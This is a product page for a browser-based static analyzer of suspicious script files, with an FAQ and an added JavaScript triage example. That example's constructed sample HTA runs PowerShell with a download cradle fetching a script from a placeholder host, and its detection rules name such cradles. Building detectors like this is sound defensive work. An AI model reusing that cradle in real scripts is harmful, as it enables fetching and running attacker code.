Free static analysis for suspicious script files. Detect dangerous APIs, obfuscation techniques, IOCs, and MITRE ATT&CK techniques — all processed locally in your browser. Files never leave your device.
Drag and drop or browse for a script file. Supports HTA, VBScript, JavaScript, PowerShell, batch, WSF, and more.
The file is parsed entirely in your browser. Pattern matching detects dangerous APIs, obfuscation, IOCs, and MITRE ATT&CK techniques.
Review a detailed verdict with severity-ranked findings, extracted IOCs, embedded script separation, and obfuscation scoring.
The analyzer runs 12 detection modules against every script file, mapping findings to MITRE ATT&CK techniques and extracting actionable IOCs.
Generates a cryptographic fingerprint for the file using the Web Crypto API for threat intel lookups.
Measures content randomness (0–8 scale) to detect packed, encrypted, or heavily obfuscated scripts.
Flags WScript.Shell, PowerShell download cradles, ActiveX objects, and other high-risk API calls.
Identifies Base64 encoding, string concatenation, Chr/fromCharCode abuse, and variable name randomization.
Extracts URLs, IP addresses, and domains used for C2 communication, payload downloads, or data exfiltration.
Identifies command execution patterns, process injection, and shell invocation methods.
Detects registry modifications, scheduled task creation, startup folder manipulation, and service installation.
Flags attempts to access the SAM database, browser credential stores, and credential dumping techniques.
Extracts IPs, domains, URLs, emails, file hashes, Windows paths, and registry keys as indicators of compromise.
Parses HTA, WSF, and SCT files to extract embedded <script> blocks for individual analysis.
Maps every finding to specific MITRE ATT&CK technique IDs for standardized threat classification.
Generates a scored verdict (clean/suspicious/malicious) with severity-ranked findings across all modules.
Static analysis examines a file's code and structure without executing it. Unlike dynamic analysis (sandboxing), which runs the file to observe behavior, static analysis parses the source code to identify dangerous patterns, obfuscation techniques, and indicators of compromise. This makes it fast, safe, and suitable for triaging suspicious files before deeper investigation.
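The kind of parse-only triage described above, as an added example (not this tool's own code): it splits an HTA into its embedded script blocks, applies a few pattern rules with ATT&CK IDs, extracts URLs, and computes byte entropy on the 0–8 scale. The rule set, function names and sample file are hypothetical and constructed for illustration.

```javascript
// Added example: static triage of script markup; the input is only parsed, never run.
// Constructed sample HTA (the URL uses the reserved .example TLD).
const SAMPLE_HTA = `<html><head><hta:application id="demo"/></head><body>
<script language="VBScript">
Set sh = CreateObject("WScript.Shell")
sh.Run "powershell -c (New-Object Net.WebClient).DownloadString('http://updates.example/a.ps1')"
</script>
<script type="text/javascript">var s = String.fromCharCode(72, 105);</script>
</body></html>`;

// Hypothetical rules: regex -> finding name and the ATT&CK technique it suggests.
const RULES = [
  { name: 'WScript.Shell instantiation', attack: 'T1059.005', re: /CreateObject\s*\(\s*["']WScript\.Shell["']\s*\)/i },
  { name: 'PowerShell invocation', attack: 'T1059.001', re: /\bpowershell(\.exe)?\b/i },
  { name: 'Download cradle', attack: 'T1105', re: /\.Download(String|File)\s*\(/i },
  { name: 'Character-code string building', attack: 'T1027', re: /\b(fromCharCode|ChrW?)\s*\(/i },
];

// Shannon entropy in bits per byte: 0 (one repeated byte) up to 8 (uniformly random).
function shannonEntropy(text) {
  const bytes = new TextEncoder().encode(text);
  const counts = new Map();
  for (const b of bytes) counts.set(b, (counts.get(b) || 0) + 1);
  let h = 0;
  for (const c of counts.values()) h -= (c / bytes.length) * Math.log2(c / bytes.length);
  return h;
}

// Split HTA/WSF/SCT markup into its embedded <script> blocks with declared language.
function extractScriptBlocks(markup) {
  const blocks = [];
  for (const m of markup.matchAll(/<script\b([^>]*)>([\s\S]*?)<\/script\s*>/gi)) {
    const lang = /(?:language|type)\s*=\s*["']?([^"'\s>]+)/i.exec(m[1]);
    blocks.push({ language: lang ? lang[1].toLowerCase() : 'unknown', code: m[2].trim() });
  }
  return blocks;
}

// Run every rule over every block and collect URLs as network IOCs.
function triage(markup) {
  const findings = [];
  extractScriptBlocks(markup).forEach((block, index) => {
    for (const { name, attack, re } of RULES) {
      if (re.test(block.code)) findings.push({ block: index, language: block.language, name, attack });
    }
  });
  const urls = [...new Set(markup.match(/https?:\/\/[^\s"'<>)]+/gi) || [])];
  return { entropy: shannonEntropy(markup), findings, urls };
}

console.log(JSON.stringify(triage(SAMPLE_HTA), null, 2));
```

Regex-based block extraction is a triage heuristic rather than a full HTML parser, so malformed or nested markup can hide a block; a file with no findings here is not thereby clean.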
Malicious scripts share common characteristics that static analysis can detect:
The obfuscation score (0–100) quantifies how heavily a script hides its true purpose. Higher scores indicate more aggressive obfuscation:
0 - 20: Clean
21 - 40: Low
41 - 60: Moderate
61 - 100: Heavy
The analyzer supports the most common script file formats used in malware delivery:
.hta: HTML Application
.vbs / .vbe: VBScript
.js / .jse: JavaScript
.ps1: PowerShell
.bat / .cmd: Batch
.wsf: Windows Script File
.wsh: Windows Script Host
.sct: Scriptlet
Unlike cloud-based scanners that upload files to remote servers, this tool performs all analysis entirely in your browser using client-side JavaScript. Your files are never transmitted, stored, or shared with any third party. This makes it safe to analyze sensitive, classified, or proprietary files without data leakage concerns.
A script file analyzer performs static analysis on script files (HTA, VBS, JS, PowerShell, batch) to detect dangerous APIs, obfuscation techniques, indicators of compromise (IOCs), and known malware patterns — without executing the file. It helps security analysts triage suspicious files safely.
Yes, completely free with no account required. Upload any supported script file and get a full static analysis report including verdict, findings, IOCs, and obfuscation scoring. All analysis runs in your browser — files are never uploaded to any server.
The tool supports 12 file types: HTA (.hta), VBScript (.vbs, .vbe), JavaScript (.js, .jse), PowerShell (.ps1), batch (.bat, .cmd), Windows Script File (.wsf), Windows Script Host (.wsh), Scriptlet (.sct), and plain text (.txt). Maximum file size is 5 MB.
No. All analysis runs entirely in your browser using client-side JavaScript. Your files are never uploaded, transmitted, or stored on any server. This makes it safe to analyze sensitive or classified files without data leakage concerns.
The analyzer detects dangerous API calls (WScript.Shell, PowerShell download cradles, ActiveX objects), obfuscation techniques (Base64 encoding, string concatenation, character code manipulation), network indicators, persistence mechanisms, credential access patterns, and maps findings to MITRE ATT&CK technique IDs.
The obfuscation score (0–100) measures how heavily a script uses techniques to hide its true purpose — Base64 encoding, string concatenation, character code conversion, variable name randomization, and entropy anomalies. Legitimate scripts typically score below 20; heavily obfuscated malware often scores above 60.
IOCs (Indicators of Compromise) are observable artifacts that indicate malicious activity — IP addresses, domains, URLs, email addresses, file hashes, Windows file paths, and registry keys. Extracting them allows analysts to pivot into threat intelligence lookups, block malicious infrastructure, and correlate with other incidents.
This tool focuses on static analysis of script files specifically — parsing code to identify dangerous patterns, obfuscation, and IOCs with MITRE ATT&CK mapping. VirusTotal focuses on hash reputation across antivirus engines. Additionally, this tool runs entirely in your browser with no file upload, while VirusTotal requires uploading files to their servers.
The DFIR Platform provides dynamic sandbox analysis, multi-engine file reputation, automated IOC enrichment, and a full investigation workflow. Free tier available.